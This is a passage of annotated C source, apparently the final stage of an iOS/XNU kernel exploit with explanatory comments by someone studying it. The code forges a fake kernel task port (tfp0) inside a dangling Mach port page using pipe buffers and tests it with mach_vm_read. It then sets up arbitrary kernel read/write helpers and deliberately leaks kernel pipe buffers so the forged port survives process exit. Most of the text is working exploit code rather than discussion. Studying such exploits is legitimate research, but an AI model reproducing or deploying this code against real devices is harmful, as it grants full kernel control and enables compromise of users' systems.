// ↑ Like he mentions, we have all ingredients to cook up a fake kernel task port.
// 1. The address of the fake ipc_object 2. The address of the fake task 3. Means to read/write arbitrary data into 1 & 2(via pipes) 4. The kernel ipc_space & vm_map
// Now let's stitch these all together to create a fake kernel task port!
int target_port_read_fd = read_ends[replacer_pipe_index];
int target_port_write_fd = write_ends[replacer_pipe_index];
uint8_t* fake_tfp0_buf = malloc(0xfff);
// Emptying the pipe. It's kind of annoying, but we have to read everything before we write: even though the pipe is non-blocking, the write won't go through until the buffer has been drained.
read(target_port_read_fd, fake_tfp0_buf, 0xfff);
// This function can now fully set up the fake ipc_port along with the fake task. We don't need the early read primitive through this port anymore(it could only read a measly few bytes per call),
// so the read address is just set to an arbitrary value. Also, we don't need to utilize the ipc_port->ip_context anymore.
// And this time around it's pointing ipc_port->ip_kobject into the dangling target ipc_port's own page(target_port_kaddr + 0x100), using it as the container for the fake task object.
// As such, everything will be self-contained including the fake ipc_port & the fake task inside one page, which is the target dangling ipc_object page.
build_fake_task_port(fake_tfp0_buf, target_port_kaddr, 0x4242424243434343, kernel_vm_map, ipc_space_kernel, 0x1234);
// Apply it to the dangling target ipc_port
write(target_port_write_fd, fake_tfp0_buf, 0xfff);
// If everything works as expected, this WILL be the kernel task port.
mach_port_t fake_tfp0 = target_port;
printf("hopefully prepared a fake tfp0!\n");
// test it!
vm_offset_t data_out = 0;
mach_msg_type_number_t out_size = 0;
// If it indeed works, then mach_vm_read will successfully read 0x40 bytes from task->vm_map, which resides in kernel memory.
err = mach_vm_read(fake_tfp0, kernel_vm_map, 0x40, &data_out, &out_size);
if (err != KERN_SUCCESS) {
printf("mach_vm_read failed: %x %s\n", err, mach_error_string(err));
sleep(3);
exit(EXIT_FAILURE);
}
// Yay! We finally made it to tfp0 without crashing the kernel. Now on to the cleanup.
printf("kernel read via second tfp0 port worked?\n");
printf("0x%016llx\n", *(uint64_t*)data_out);
printf("0x%016llx\n", *(uint64_t*)(data_out+8));
printf("0x%016llx\n", *(uint64_t*)(data_out+0x10));
printf("0x%016llx\n", *(uint64_t*)(data_out+0x18));
// Just setting some global vars
prepare_for_rw_with_fake_tfp0(fake_tfp0);
// can now use {r,w}k_{32,64}
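// For reference, a minimal sketch(assumed; the real helpers live in kmem.h) of what rk64/wk64
// boil down to once a usable tfp0 exists:
/*
uint64_t rk64_sketch(mach_port_t tfp0, uint64_t kaddr) {
    uint64_t val = 0;
    mach_vm_size_t outsize = 0;
    mach_vm_read_overwrite(tfp0, kaddr, sizeof(val), (mach_vm_address_t)&val, &outsize);
    return val;
}
void wk64_sketch(mach_port_t tfp0, uint64_t kaddr, uint64_t val) {
    mach_vm_write(tfp0, kaddr, (vm_offset_t)&val, sizeof(val));
}
*/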
// cleanup:
// clean up the fake canary port entry:
// Remember, the fake_canary_port's ref count is incorrectly 2. Just wipe its entry out completely from the task's is_table.
// It's wiping out the entry's ie_object as well as its ie_bits and ie_index.
// It doesn't fix up the entry's free-list link(ie_next), so one entry is leaked in the is_table, but that's a minor issue that can be ignored.
wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t), 0);
wk64(is_table + ((fake_canary_port >> 8) * sizeof_ipc_entry_t) + 8, 0);
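// For reference, the (simplified) layout of the 0x18-byte ipc_entry being wiped here, based on the XNU definition:
/*
struct ipc_entry {
    struct ipc_object *ie_object;   // <- the first wk64 zeroes this
    ipc_entry_bits_t   ie_bits;     // <- the second wk64 zeroes ie_bits...
    mach_port_index_t  ie_index;    // <- ...and ie_index
    union {
        mach_port_index_t next;     // free-list link; left untouched, hence the leaked entry mentioned above
        ipc_table_index_t request;
    } index;
};
*/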
// leak the pipe buffer which replaces the dangling port:
printf("going to try to clear up the pipes now\n");
// Now it's following a chain of pointers.
// task->bsd_info->p_fd->fd_ofiles[target_port_read_fd]->f_fglob->fg_data
// finally we have to fix up the pipe's buffer
// for this we need to find the process fd table:
// struct proc:
uint64_t proc_addr = rk64(task_kaddr + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));
// struct filedesc
uint64_t filedesc = rk64(proc_addr + koffset(KSTRUCT_OFFSET_PROC_P_FD));
// base of ofiles array
uint64_t ofiles_base = rk64(filedesc + koffset(KSTRUCT_OFFSET_FILEDESC_FD_OFILES));
uint64_t ofiles_offset = ofiles_base + (target_port_read_fd * 8);
// struct fileproc
uint64_t fileproc = rk64(ofiles_offset);
// struct fileglob
uint64_t fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));
// struct pipe
uint64_t pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));
// clear the inline struct pipebuf
// fg_data will actually point to a pipe object as can be seen from the pipe() syscall implementation.
/*
#define f_data f_fglob->fg_data
int pipe(proc_t p, __unused struct pipe_args *uap, int32_t *retval)
{
struct pipe *rpipe, *wpipe;
..
..
..
rf->f_data = (caddr_t)rpipe;
*/
// And it's wiping out the entire pipe->pipebuf object
/*
struct pipe {
struct pipebuf pipe_buffer;
...
...
};
struct pipebuf {
u_int cnt; /* number of chars currently in buffer * /
u_int in; /* in pointer * /
u_int out; /* out pointer * /
u_int size; /* size of buffer * /
caddr_t buffer; /* kva of buffer * /
};
*/
printf("clearing pipebuf: %llx\n", pipe);
wk64(pipe + 0x00, 0);
wk64(pipe + 0x08, 0);
wk64(pipe + 0x10, 0);
// do the same for the other end:
ofiles_offset = ofiles_base + (target_port_write_fd * 8);
// struct fileproc
fileproc = rk64(ofiles_offset);
// struct fileglob
fileglob = rk64(fileproc + koffset(KSTRUCT_OFFSET_FILEPROC_F_FGLOB));
// struct pipe
pipe = rk64(fileglob + koffset(KSTRUCT_OFFSET_FILEGLOB_FG_DATA));
printf("clearing pipebuf: %llx\n", pipe);
wk64(pipe + 0x00, 0);
wk64(pipe + 0x08, 0);
wk64(pipe + 0x10, 0);
// Why did it have to clear the internal pipe structs?
// To answer this, let's imagine what happens when this process exits. All file descriptors will be recursively closed, including the pipes that are covering
// the page containing the dangling port.
// What happens when a pipe closes?
/*
static const struct fileops pipeops = {
.fo_type = DTYPE_PIPE,
.fo_read = pipe_read,
.fo_write = pipe_write,
.fo_ioctl = pipe_ioctl,
.fo_select = pipe_select,
.fo_close = pipe_close, <- This one right here
.fo_kqfilter = pipe_kqfilter,
.fo_drain = pipe_drain,
};
static int
pipe_close(struct fileglob *fg, __unused vfs_context_t ctx)
{
struct pipe *cpipe;
proc_fdlock_spin(vfs_context_proc(ctx));
cpipe = (struct pipe *)fg->fg_data; <- remember this points to a pipe object
fg->fg_data = NULL;
proc_fdunlock(vfs_context_proc(ctx));
if (cpipe)
pipeclose(cpipe); <- our pipe object is passed down here
return (0);
}
static void
pipeclose(struct pipe *cpipe)
{
...
...
pipe_free_kmem(cpipe); <- Trying to free it...?
...
...
}
static void
pipe_free_kmem(struct pipe *cpipe)
{
if (cpipe->pipe_buffer.buffer != NULL) {
OSAddAtomic(-(cpipe->pipe_buffer.size), &amountpipekva);
OSAddAtomic(-1, &amountpipes);
kfree((void *)cpipe->pipe_buffer.buffer, cpipe->pipe_buffer.size); <- THIS RIGHT HERE.
cpipe->pipe_buffer.buffer = NULL;
cpipe->pipe_buffer.size = 0;
}
}
*/
// Aha! So now we understand why it was doing all that stuff. It's trying to intentionally leak the memory by wiping out all those members.
// It's specifically leaking the page that contains the fake kernel task port.
// kfree() will simply do nothing when provided NULL arguments.
// We're doing this because we don't want this critical chunk of memory to be deallocated when the pipes are closed or the process exits.
// I think if you skip this step, then the kernel will panic as soon as the process exits, or the pipes are closed.
printf("done!\n");
printf("use the functions in kmem.h to read and write kernel memory\n");
printf("tfp0 in there will stay alive once this process exits\n");
printf("keep hold of a send right to it; don't expect this exploit to work again without a reboot\n");
}